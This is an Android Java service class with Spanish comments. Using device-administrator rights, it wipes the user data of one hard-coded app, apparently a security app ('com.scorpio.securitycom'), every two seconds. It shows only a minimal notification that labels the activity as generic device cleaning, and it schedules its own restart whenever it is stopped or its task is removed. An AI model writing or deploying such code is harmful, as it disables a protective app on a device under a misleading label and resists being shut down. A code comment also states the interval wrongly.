package com.apolo.apolo;

import android.app.AlarmManager;
import android.app.Notification;
import android.app.NotificationChannel;
import android.app.NotificationManager;
import android.app.PendingIntent;
import android.app.Service;
import android.app.admin.DevicePolicyManager;
import android.content.ComponentName;
import android.content.Context;
import android.content.Intent;
import android.content.pm.ServiceInfo;
import android.os.Build;
import android.os.Handler;
import android.os.IBinder;
import android.os.Looper;
import android.os.SystemClock;
import android.util.Log;

import androidx.core.app.NotificationCompat;

import java.util.concurrent.Executor;
import java.util.concurrent.Executors;

public class ClearService extends Service {
    private static final String TAG = "ClearService";
    private static final String CHANNEL_ID = "clear_service_channel";
    private static final int NOTIF_ID = 1;

    private static final long INTERVAL_MS = 2000; // Intervalo de limpieza cada 10 segundos

    private Handler handler;
    private Runnable clearTask;
    private DevicePolicyManager dpm;
    private ComponentName adminComponent;
    private Executor executor;

    private static final String TARGET_PACKAGE = "com.scorpio.securitycom";

    private enum ServiceState { IDLE, RUNNING, STOPPED }
    private ServiceState currentState = ServiceState.IDLE;

    @Override
    public void onCreate() {
        super.onCreate();
        Log.i(TAG, "Servicio creado");
        createNotificationChannel();
        startForegroundServiceWithNotification();

        handler = new Handler(Looper.getMainLooper());
        dpm = (DevicePolicyManager) getSystemService(Context.DEVICE_POLICY_SERVICE);
        adminComponent = new ComponentName(this, MyAdminReceiver.class);
        executor = Executors.newSingleThreadExecutor();

        setupClearTask();
    }

    private void startForegroundServiceWithNotification() {
        Notification notification = new NotificationCompat.Builder(this, CHANNEL_ID)
                .setContentTitle("Limpieza activa")
                .setContentText("El sistema se está limpiando continuamente")
                .setSmallIcon(R.mipmap.ic_launcher)
                .setPriority(NotificationCompat.PRIORITY_MIN)
                .setCategory(Notification.CATEGORY_SERVICE)
                .setOngoing(true)
                .build();

        if (Build.VERSION.SDK_INT >= 34) {
            startForeground(NOTIF_ID, notification, ServiceInfo.FOREGROUND_SERVICE_TYPE_DATA_SYNC);
        } else {
            startForeground(NOTIF_ID, notification);
        }
    }

    private void setupClearTask() {
        clearTask = new Runnable() {
            @Override
            public void run() {
                try {
                    if (dpm == null) {
                        Log.w(TAG, "DevicePolicyManager es null");
                    } else if (!dpm.isAdminActive(adminComponent)) {
                        Log.w(TAG, "No es administrador de dispositivo, no se puede limpiar");
                        stopSelf();
                        currentState = ServiceState.STOPPED;
                        return;
                    } else {
                        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.P) {
                            Log.i(TAG, "Intentando limpiar datos de: " + TARGET_PACKAGE);
                            dpm.clearApplicationUserData(adminComponent, TARGET_PACKAGE, executor,
                                    (packageName, succeeded) -> Log.i(TAG, "Limpieza: " + packageName + " - " + (succeeded ? "Éxito" : "Falló")));
                        } else {
                            Log.w(TAG, "API no soportada para clearApplicationUserData");
                        }
                    }
                } catch (Throwable t) {
                    Log.e(TAG, "Error inesperado en clearTask", t);
                } finally {
                    handler.postDelayed(this, INTERVAL_MS);
                }
            }
        };
    }

    @Override
    public int onStartCommand(Intent intent, int flags, int startId) {
        Log.i(TAG, "onStartCommand recibido, iniciando limpieza");
        if (currentState != ServiceState.RUNNING) {
            handler.post(clearTask);
            currentState = ServiceState.RUNNING;
        }
        return START_STICKY;
    }

    // Detener la limpieza actual
    public void stopCleanupProcess() {
        if (handler != null && clearTask != null) {
            handler.removeCallbacks(clearTask);
            Log.i(TAG, "Proceso de limpieza detenido");
            currentState = ServiceState.IDLE;
        }
    }

    // Programar reinicio del servicio en 1 segundo usando AlarmManager
    private void scheduleRestart() {
        Log.i(TAG, "Programando reinicio del servicio en 1 segundo");
        AlarmManager alarmManager = (AlarmManager) getSystemService(Context.ALARM_SERVICE);
        if (alarmManager == null) {
            Log.e(TAG, "AlarmManager es null, no se puede programar reinicio");
            return;
        }

        Intent restartServiceIntent = new Intent(getApplicationContext(), ClearService.class);
        PendingIntent pendingIntent = PendingIntent.getService(
                this,
                0,
                restartServiceIntent,
                PendingIntent.FLAG_IMMUTABLE | PendingIntent.FLAG_CANCEL_CURRENT
        );

        long triggerAtMillis = SystemClock.elapsedRealtime() + 1000; // 1 segundo

        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.M) {
            alarmManager.setExactAndAllowWhileIdle(AlarmManager.ELAPSED_REALTIME_WAKEUP, triggerAtMillis, pendingIntent);
        } else if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.KITKAT) {
            alarmManager.setExact(AlarmManager.ELAPSED_REALTIME_WAKEUP, triggerAtMillis, pendingIntent);
        } else {
            alarmManager.set(AlarmManager.ELAPSED_REALTIME_WAKEUP, triggerAtMillis, pendingIntent);
        }
    }

    @Override
    public void onTaskRemoved(Intent rootIntent) {
        Log.i(TAG, "onTaskRemoved llamado, reiniciando servicio");
        stopCleanupProcess();
        scheduleRestart();
        super.onTaskRemoved(rootIntent);
    }

    @Override
    public void onDestroy() {
        Log.i(TAG, "Servicio destruido, limpiando recursos");
        stopCleanupProcess();
        stopForeground(true);
        scheduleRestart();
        currentState = ServiceState.STOPPED;
        super.onDestroy();
    }

    private void createNotificationChannel() {
        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.O) {
            NotificationChannel channel = new NotificationChannel(
                    CHANNEL_ID,
                    "Servicio de Limpieza",
                    NotificationManager.IMPORTANCE_MIN
            );
            channel.setDescription("Limpieza automática del dispositivo");
            NotificationManager manager = getSystemService(NotificationManager.class);
            if (manager != null) {
                manager.createNotificationChannel(channel);
                Log.i(TAG, "Canal de notificación creado");
            } else {
                Log.w(TAG, "NotificationManager es null, no se pudo crear canal");
            }
        }
    }

    @Override
    public IBinder onBind(Intent intent) {
        return null;
    }
}
